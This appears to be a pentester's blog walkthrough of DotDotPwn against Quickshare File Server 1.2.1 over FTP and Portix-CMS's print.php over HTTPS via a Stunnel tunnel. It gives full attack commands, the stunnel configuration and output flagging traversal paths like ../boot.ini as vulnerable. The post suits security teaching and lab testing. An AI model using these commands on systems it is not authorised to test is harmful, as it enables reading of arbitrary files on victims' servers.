Directory Traversal with DotDotPwn (HTTPS Mode)
This is my experience when I was dealing with some applications that have a Directory Traversal vulnerability. I was using DotDotPwn by nitr0us when finding a vulnerability on Quickshare File Server 1.2.1 (on the FTP protocol). I also used DotDotPwn when doing a pentest on my client. So, let the experience tell you the story.
Quickshare File Server 1.2.1
First, I download the software here, setup the XP lab machine, download DotDotPwn here, and all preparation should be ready. We must setup the Quickshare File Server to point to our FTP directory, let the user set to “Allow anonymous user”.
Now, launch the DotDotPwn to attack the Quickshare File Server. Here are my attack commands:
bash-3.2# perl dotdotpwn.pl -m ftp -h 192.168.1.19 -O -s -U anonymous -P '[email protected]' -b [========== TARGET INFORMATION ==========] [+] Hostname: 192.168.1.19 [+] Detecting Operating System (nmap) ... [+] Operating System detected: Microsoft Windows Server 2003 SP1 or SP2 [+] Protocol: ftp [+] Port: 21 [+] Service detected: 220 quickshare ftpd ready. [=========== TRAVERSAL ENGINE ===========] [+] Creating Traversal patterns (mix of dots and slashes) [+] Multiplying 6 times the traversal patterns (-d switch) [+] Creating the Special Traversal patterns [+] Translating (back)slashes in the filenames [+] Adapting the filenames according to the OS type detected (windows) [+] Including Special sufixes [+] Traversal Engine DONE ! - Total traversal tests created: 4656 [=========== TESTING RESULTS ============] [+] Ready to launch 3.33 traversals per second [+] Press any key to start the testing (You can stop it pressing Ctrl + C) [+] Username: anonymous [+] Password: [email protected] [+] Connecting to the FTP server at '192.168.1.19' on port 21 [+] FTP Server's Current Path: / [+] Local Path to download files: /pentest/fuzzers/dotdotpwn-v2.1/retrieved_files [+] Press any key to continue [+] Testing ... [*] Testing Path: ../boot.ini [*] Testing Path: ../windows/system32/drivers/etc/hosts [*] Testing Path: ../config.inc.php [*] Testing Path: ../web.config [*] Testing Path: ../../boot.ini [*] Testing Path: ../../windows/system32/drivers/etc/hosts [*] Testing Path: ../../config.inc.php [*] Testing Path: ../../web.config [*] CD ../../../ | GET boot.ini <== VULNERABLE
From the result above, we know that QuickShare File Server has a directory traversal vulnerability. You can download any file on the operating system that run Quickshare File Server as long as you know the exact path and the file you wish to download.
DotDotPwn vs SSL
OK, it’s on a FTP protocol, but what if it’s on FTPS or HTTPS instead? DotDotPwn, by default, cannot talk to a secure channel such as FTPS or HTTPS. While doing a pentest on a client, I was facing a web server with a SSL connection. Since the DotDotPwn cannot launch the attack on a FTPS or HTTPS protocol, we must trick the DotDotPwn to send the attack via a secure channel. How do we do this?
You can use Stunnel to set the secure channel, and pass the DotDotPwn to this secure channel made by Stunnel and voila the attack will work properly. Of course you can use Burp as well, but this is just another option when you don’t have Burp on our machine (euh! why would a pentester won’t install Burp on their pentest machine?!)
Make some fun
Let’s have some fun with Stunnel and DotDotPwn, here I installed a vulnerable web application called Portix-CMS on Windows 2003 Server. I setup the Stunnel secure channel to accept a connection on port 8080 , the DotDotPwn will go through this port. Here is my stunnel configuration:
bash-3.2# cat stunnel.conf cert = /opt/local/etc/stunnel/stunnel.pem #Don’t forget to download a default cert. #Some security enhancements for UNIX systems - comment them out on Win32 client = yes #options=NO_SSLv2 debug = 5 ; Service-level configuration [https] accept = 127.0.0.1:8080 connect = 192.168.1.19:443
Note: Follow this HOWTO to create your own certificate, also please change your configuration to your own lab!
Now, we can run Stunnel:
bash-3.2# stunnel /opt/local/etc/stunnel/stunnel.conf[/code] And test the connection to the HTTPS protocol: [code lang="bash" light="true"]bash-3.2# nc localhost 8080 HEAD /cms/ HTTP/1.0 HTTP/1.1 200 OK Date: Sun, 18 Mar 2012 17:08:57 GMT Server: Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d mod_autoindex_color PHP/5.2.1 X-Powered-By: PHP/5.2.1 Set-Cookie: PHPSESSID=f05f1197ceadea3d2625d09da9bb49a3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: COMPTEURSIMPLE=Count; expires=Sun, 18-Mar-2012 18:09:01 GMT Connection: close Content-Type: text/html
We can see 200 OK, it means that our HTTPS connection via Stunnel is successfully established. Ok, next we will fire up the DotDotPwn against PortixCMS via Stunnel. Here is my setup (you can see DotDotPwn help to understand what i’m doing with those options)
bash-3.2# perl dotdotpwn.pl -m http-url -h 127.0.0.1 -x 8080 -O -s -u http://127.0.0.1:8080/cms/print.php?page=TRAVERSAL -k WINDOWS -b -q [+] Report name: Reports/127.0.0.1_03-18-2012_23-59.txt [========== TARGET INFORMATION ==========] [+] Hostname: 127.0.0.1 [+] Detecting Operating System (nmap) ... [+] Operating System detected: [+] Protocol: http [+] Port: 8080 [+] Service detected: Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d mod_autoindex_color PHP/5.2.1 [=========== TRAVERSAL ENGINE ===========] [+] Creating Traversal patterns (mix of dots and slashes) [+] Multiplying 6 times the traversal patterns (-d switch) [+] Creating the Special Traversal patterns [+] Translating (back)slashes in the filenames [+] Adapting the filenames according to the OS type detected (generic) [+] Including Special sufixes [+] Traversal Engine DONE ! - Total traversal tests created: 14640 [=========== TESTING RESULTS ============] [+] Ready to launch 3.33 traversals per second [+] Press Enter to start the testing (You can stop it pressing Ctrl + C) [+] Replacing "TRAVERSAL" with the traversals created and sending . . [*] Testing URL: http://127.0.0.1:8080/cms/print.php?page=../../../../../boot.ini <== VULNERABLE [+] Fuzz testing finished after 0.08 minutes (5 seconds) [+] Total Traversals found: 1 [+] Report saved: Reports/127.0.0.1_03-18-2012_23-59.txt
w00t! DotDotPwn works flawlessly. Now you can use this setup if you forgot to include Burpsuite on your pentest box ?
Have fun!